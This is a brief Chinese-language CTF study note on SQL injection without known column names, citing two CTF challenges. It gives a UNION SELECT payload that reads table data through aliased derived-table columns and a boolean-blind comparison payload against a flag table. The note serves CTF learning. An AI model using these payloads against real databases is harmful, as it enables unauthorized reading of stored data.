未知字段名下查询.md

参考[SWPU2019]Web1（学习）

union select 
1,
(
	select group_concat(<name_x>)
	from
	(
		select 1 as <name_1>, 2 as <name_2>, 3 as <name_3>
		union select * from <table_name>
	)
),
3

另一种方法参考[GYCTF2020]Ezsqli，适用于布尔盲注

((select 1,"%s") < (select * from f1ag_1s_h3r3_hhhhh))#

#Web #SQL注入 #联合注入 #无字段名注入